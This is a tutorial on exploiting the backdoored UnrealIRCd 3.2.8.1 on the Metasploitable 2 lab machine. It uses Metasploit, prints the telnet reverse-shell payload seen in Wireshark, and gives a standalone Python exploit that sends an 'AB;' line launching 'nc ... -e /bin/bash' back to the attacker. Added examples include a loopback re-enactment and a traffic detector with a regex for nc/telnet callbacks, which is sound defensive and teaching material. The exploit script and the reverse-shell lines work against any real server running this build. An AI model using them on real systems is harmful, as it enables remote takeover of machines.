Metasploitable 2 - IRC Backdoor
The first tutorial on Metasploitable 2 covered the vsftpd backdoor; in this post we look at the IRC backdoor.
In the first part of this how-to we run the Metasploit exploit (the skid way).
In the second part we write our own Python exploit that triggers the backdoor directly.
#The Metasploit way
The first thing to do is an nmap scan of the machine to see which ports are open.
We know that IRC is on port 6667; use the -sV argument to get the version of the server.
The version here is UnrealIRCd, so run msfconsole and search for "unreal": the module is exploit/unix/irc/unreal_ircd_3281_backdoor.
We just need to use that module and set RHOST to the target.
Now run “exploit -j” to launch it as a background job, wait for the session to open, and attach to it with sessions -i <id>.
You’re done: you have successfully exploited the Metasploitable 2 machine!
Understanding the exploit
The first part was really easy, but let’s read the module’s code to understand how it works.
Let’s focus on this part.
Even if you don’t know Ruby you can see how the exploit works:
Metasploit connects to the IRC port and sends a single line,
AB; <the payload>\n
and that line triggers the backdoor, which runs whatever the payload is. The reason it looks like this: the trojaned UnrealIRCd 3.2.8.1 build hands every buffer it reads from a client to system() whenever the first two bytes are "AB". The server therefore runs "AB; <payload>" in sh, where "AB" fails as a command and the ";" makes the shell carry on and execute the payload.
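To see that trigger end to end without a Metasploitable VM, here is an added example (it is not the page’s script and not UnrealIRCd’s code) that re-implements only the trojan’s check on a throwaway loopback listener and sends the same "AB; <payload>" line at it. The function names, the greeting banner and the payload are assumptions of this example.

```python
#!/usr/bin/env python3
"""Loopback re-enactment of the UnrealIRCd 3.2.8.1 "AB" backdoor.

Added example, not code from the page or from UnrealIRCd: the server
side implements only the trojan's check (first two bytes of the buffer
read from the socket == "AB"  ->  whole buffer handed to system()) on a
throwaway listener.  All names, the banner and the payload are ours.
"""
import socket
import subprocess
import threading

TRIGGER = b"AB"  # the trojan's DEBUGMODE3_INFO string


def backdoor_dispatch(buf: bytes):
    """What the trojaned ircd does with one buffer read from the client.

    Returns None for ordinary IRC traffic.  Otherwise runs the whole
    buffer through sh -c, as system() does, and returns
    (stdout, stderr, returncode).
    """
    if buf[:2] != TRIGGER:
        return None
    # "AB" is not a command, so sh prints "AB: not found" on stderr and
    # then executes whatever follows the ';'.  That is why the exploit
    # sends "AB; <payload>" and not just "<payload>".
    proc = subprocess.run(buf.decode(errors="replace"), shell=True,
                          capture_output=True, text=True, timeout=10)
    return proc.stdout, proc.stderr, proc.returncode


def mock_ircd(ready, port_box, result_box):
    """Fake ircd: greet one client, read one buffer, dispatch it, record the result."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port, published via port_box
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    with srv, conn:
        # the greeting the exploit discards before sending the trigger (constructed text)
        conn.sendall(b":irc.example NOTICE AUTH :*** Looking up your hostname...\r\n")
        result_box.append(backdoor_dispatch(conn.recv(4096)))


def run_exchange(payload: bytes):
    """Client side, the same exchange the Metasploit module does: connect,
    swallow the greeting, send "AB; <payload>" plus newline, and return
    what the fake server did with it."""
    ready, port_box, result_box = threading.Event(), [], []
    t = threading.Thread(target=mock_ircd, args=(ready, port_box, result_box), daemon=True)
    t.start()
    ready.wait(5)
    with socket.create_connection(("127.0.0.1", port_box[0]), timeout=5) as s:
        s.recv(2048)
        s.sendall(b"AB; " + payload + b"\n")
    t.join(15)
    return result_box[0]


if __name__ == "__main__":
    out, err, rc = run_exchange(b"id; echo trigger-worked")
    print("stdout:", out)   # output of id, then trigger-worked
    print("stderr:", err)   # sh complaining that AB is not a command
```

Run it as is and you get the two halves of what the real server does: the complaint about "AB" on stderr, then the payload’s output. Sending a normal IRC line such as NICK through backdoor_dispatch returns None, which is the "legitimate client" path.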
Sniffing with Wireshark
Let’s run the exploit again and sniff the traffic with Wireshark.
As you can see, the trigger string AB; sh is right there in the first packet.
Select the second packet and look at the data.
Here we see the complete payload:
sh -c '(sleep 3862|telnet ip port| while : ; do sh && break; done 2>&1|telnet ip port > /dev/null 2>&1 &)'
This is Metasploit’s cmd/unix/reverse payload, a two-connection telnet reverse shell: the first telnet feeds whatever the handler sends into sh’s stdin (the sleep only keeps that pipe open), sh’s output goes back out through the second telnet, and the handler glues the two connections into one session.
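The same traffic from the defender’s side, as an added example that is not part of the original post: it scans client-to-server buffers from a capture for the trigger and pulls out the command and the callback address, which is what you want for triage. SAMPLE_STREAM is constructed by hand to resemble the stream above (the 172.28.128.1 callback address, the regex and the names are assumptions of this example).

```python
#!/usr/bin/env python3
"""Spot the UnrealIRCd "AB" trigger in captured client->server data.

Added example, not code from the page.  SAMPLE_STREAM is constructed by
hand to look like the stream in the Wireshark screenshots; the names,
the regex and the addresses in it are ours.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed client->server payloads on tcp/6667, one per send().  Not a real capture.
SAMPLE_STREAM = [
    b"NICK hunter\r\n",
    b"USER hunter 0 * :just an irc user\r\n",
    b"PRIVMSG #chan :AB; in the middle of a line is harmless\r\n",
    b"AB; sh -c '(sleep 3862|telnet 172.28.128.1 4444| while : ; do sh && break; done "
    b"2>&1|telnet 172.28.128.1 4444 > /dev/null 2>&1 &)'\n",
    b"AB; sh -c '(nc 172.28.128.1 1337 -e /bin/bash) '\n",
    b"AB uname -a\n",   # a probe: still reaches system(), even without the ';'
]

# nc/telnet style callbacks; enough for the payloads Metasploit and the script below send.
CALLBACK_RE = re.compile(rb"\b(?:nc|ncat|netcat|telnet)\s+([\w.\-]+)\s+(\d{1,5})\b")


@dataclass
class Alert:
    index: int                            # position of the offending buffer in the stream
    command: str                          # what the server would hand to system()
    callback: Optional[Tuple[str, int]]   # where the reverse shell goes, if we can tell


def is_trigger(buf: bytes) -> bool:
    """The trojan compares only the first two bytes of each buffer it reads.
    No legitimate IRC command starts with "AB", so this check is precise."""
    return buf[:2] == b"AB"


def extract_command(buf: bytes) -> str:
    """The ';' after AB is just the exploit's separator; what follows is the real command."""
    return buf[2:].lstrip(b";").strip().decode(errors="replace")


def extract_callback(buf: bytes) -> Optional[Tuple[str, int]]:
    m = CALLBACK_RE.search(buf)
    return (m.group(1).decode(), int(m.group(2))) if m else None


def scan_stream(stream: List[bytes]) -> List[Alert]:
    return [Alert(i, extract_command(buf), extract_callback(buf))
            for i, buf in enumerate(stream) if is_trigger(buf)]


if __name__ == "__main__":
    for a in scan_stream(SAMPLE_STREAM):
        print(f"#{a.index}: callback={a.callback} cmd={a.command}")
```

In Wireshark the quick equivalent is the display filter frame contains "AB;" on port 6667 traffic, but remember that the server only looks at the first two bytes of what it reads, so a buffer without the semicolon (the last sample line) still gets executed and should still be flagged.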
Now that we know how the exploit works, it’s time to write our own implementation in Python.
#IRC Unreal Python
The Python script only sends the trigger line to the IRC server; the reverse shell itself comes back to a separate netcat listener (nc -lvp 1337 on the attacking box), so start that listener first. The script takes the victim IP, the IP the listener is on, and the listener port.
#!/usr/bin/env python3
import argparse
import socket

parser = argparse.ArgumentParser(description='Python implementation of the Unreal IRC backdoor')
parser.add_argument('-i', '--host', required=True, help="IP of the victim")
parser.add_argument('-l', '--lhost', required=True, help="IP of the netcat listener (your attacking box)")
parser.add_argument('-p', '--port', required=True, help="Port of the netcat listener")
arg = parser.parse_args()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((arg.host, 6667))   # Connect to the IRC server
s.recv(2048)                  # Read the server's greeting before sending the trigger
# "AB" is what the backdoor looks for; the ';' makes sh skip the bogus "AB" command and run ours.
# The netcat on Metasploitable 2 supports -e, which hands /bin/bash to the connection.
s.send(("AB; sh -c '(nc " + arg.lhost + " " + arg.port + " -e /bin/bash) '\n").encode())
s.close()
Run the script (replace YOUR_IP with the address the listener is on):
./unreal_irc.py -i 172.28.128.3 -l YOUR_IP -p 1337
And here you go